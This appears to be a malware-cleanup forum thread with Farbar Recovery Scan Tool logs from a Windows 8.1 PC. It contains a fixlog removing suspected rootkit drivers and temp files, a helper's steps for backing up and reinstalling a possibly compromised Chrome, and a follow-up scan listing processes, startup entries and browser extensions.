"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F323F12D-3EEC-4458-B055-FBAD54D42779}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F67B498-C298-4567-8384-9D4AE7900D1F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{39A83BDE-1430-4A5B-8585-D464B7D8D881}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9965AD37-C5DF-45BB-A1C2-549EA064C54F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B8A59D96-BE63-4FC8-A092-04A578AB2D75}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5BAFDC52-58EF-4B5B-A341-46B75F445987}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5FA44F3-6E70-484A-B950-51C23F63C442}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{798BE548-E73F-4AF0-94AC-9E161FCF481B}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{53056AED-CF0C-4B77-BE51-E7320F566EF1}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{99F55921-8B24-4D45-9447-4B1DC03D0F8F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{926B5B97-5586-42AD-A783-764467766E9E}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3982D1B5-9BA8-4969-BF52-16243FA460F3}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{38634E52-E26E-4827-B65C-6FD60DEEFCC1}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}" => not found
"C:\Program Files (x86)\IncrediMail" => not found
C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss => moved successfully
C:\Program Files (x86)\UCBrowser => moved successfully
C:\Windows\System32\drivers\WinmonFS.sys => moved successfully
C:\Windows\System32\drivers\Winmon.sys => moved successfully
Could not move "C:\Windows\2CCD359FD649.sys" => Scheduled to move on reboot.
"C:\Users\Stanley\AppData\Roaming\EpicNet Inc" => not found
"C:\Windows\rss\csrss.exe" => not found
"C:\Windows\windefender.exe" => not found
"C:\Users\Stanley\AppData\Roaming\EpicNet Inc" => not found
C:\Users\RoseGold\AppData\Local\Temp\syncios.exe => moved successfully
C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe => moved successfully
C:\Users\Stanley\AppData\Local\Temp\syncios.exe => moved successfully
C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 136055492 B
Java, Flash, Steam htmlcache => 1043 B
Windows/system/drivers => 30584 B
Edge => 0 B
Chrome => 2285654920 B
Firefox => 115633553 B
Opera => 104112666 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 249204 B
systemprofile32 => 128 B
LocalService => 8428 B
NetworkService => 219514 B
Stanley => 302640661 B
RoseGold => 133325 B
Administrator => 129509 B

RecycleBin => 75887717 B
EmptyTemp: => 2.8 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 15-02-2019 00:07:15)

C:\Windows\2CCD359FD649.sys => Could not move

==== End of Fixlog 00:07:16 ====


Your copy of Chrome has probably been compromised

Step 1: Remove Chrome from your computer and reinstall a fresh copy later.

Step 2: If you remove the syncing of your account you must remove it before you save your bookmarks etc...
Delete Your Google Chrome Browser Sync Data if you sync with other devices. <- Important ...
https://forums.malwarebytes.com/topic/214325-chrome-secure-preferences-detection-always-comes-back/

Step 3: Before you remove Chrome, export your bookmarks.
Chrome will export your bookmarks as an HTML file, which you can then import into another browser.
How To: http://ccm.net/faq/31791-how-to-backup-your-google-chrome-bookmarks

Step 4: Before you remove Chrome, export your passwords.
How to export your saved passwords from Chrome
https://betanews.com/2018/03/09/export-chrome-passwords/

Step 5: Clear your Chrome cache and cookies.
https://support.google.com/chromebook/answer/183083?hl=en

Step 6: Remove Chrome using the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

Step 7: Re-install Chrome and the bookmarks.
<<<>>>

How is it now?


FRST.TXT

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13.02.2019
Ran by #Strazzo.RoseGold## (administrator) on STRAZZOWEEZY (17-02-2019 12:44:19)
Running from C:\Users\Stanley\Downloads\FRST
Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator)
Platform: Windows 8.1 Enterprise (Update) (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe
(HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Iskysoft) C:\Program Files (x86)\iSkysoft\IAF\2.4.2.223\IsAppService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
( ) C:\Program Files\OpenVPN\bin\openvpnserv2.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Apple, Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\secd.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler64.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16.0.3327.1048_x64__8wekyb3d8bbwe\onenoteim.exe
(Microsoft Corporation) C:\Windows\System32\UserAccountBroker.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [53540200 2019-02-08] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [672384 2018-04-26] (OpenVPN Technologies, Inc. -> )
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [uTorrent] => C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe [1908920 2019-01-17] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3907152 2015-07-07] (Tonec Inc. -> Tonec Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RIMDeviceManager] => C:\Program Files (x86)\Common Files\Research In Motion\RIMDeviceManager\RIMDeviceManager.exe [2471672 2015-05-20] (BlackBerry Ltd. -> Research In Motion Limited)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [68408 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [67896 2019-01-15] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-22] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {2c5e9d22-76c0-11e8-825e-402cf4d8539a} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL E:\start.exe
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0bf7-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0c50-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0d35-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-18\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Drivers32-x32: [msacm.iac2] => C:\Windows\SysWOW64\iac25_32.ax [197632 2013-08-22] (Intel Corporation)
HKLM\...\Drivers32-x32: [VIDC.GEOS] => C:\Windows\SysWOW64\GeoCodecD.dll [622592 2010-10-11] (GeoVision)
HKLM\Software\Microsoft\Active Setup\Installed Components: [OpenVPN_UserSetup] -> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /t REG_SZ /d "C:\Program Files\OpenVPN\bin\openvpn-gui.exe" /f
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\Installer\chrmstp.exe [2019-02-15] (Google LLC -> Google Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{65122CB0-EA0F-47DF-A953-017170ED12F9}] -> "C:\Program Files (x86)\UCBrowser\Application\7.0.185.1002\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --wow-install-target-path="C:\Program Files (x86)\UCBrowser"
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
GroupPolicy: Restriction ? <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{25D62E88-57F7-4879-91B3-0FBE5C8B4F71}: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{8BF038DF-16AA-4203-90BE-740E3461F3D4}: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{D14C4B82-5B48-498C-8F6E-81ADA12C1C8C}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{D433F076-2F7D-4301-BE73-E8CE381871C0}: [DhcpNameServer] 192.168.8.1

Internet Explorer:
==================
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
IE Session Restore: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> is enabled.

FireFox:
========
FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-15]
FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-16] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: Profile 3
CHR Session Restore: Profile 3 -> is enabled.
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-15]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-15]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-15]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-15]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-15]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-15]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-15]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-15]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
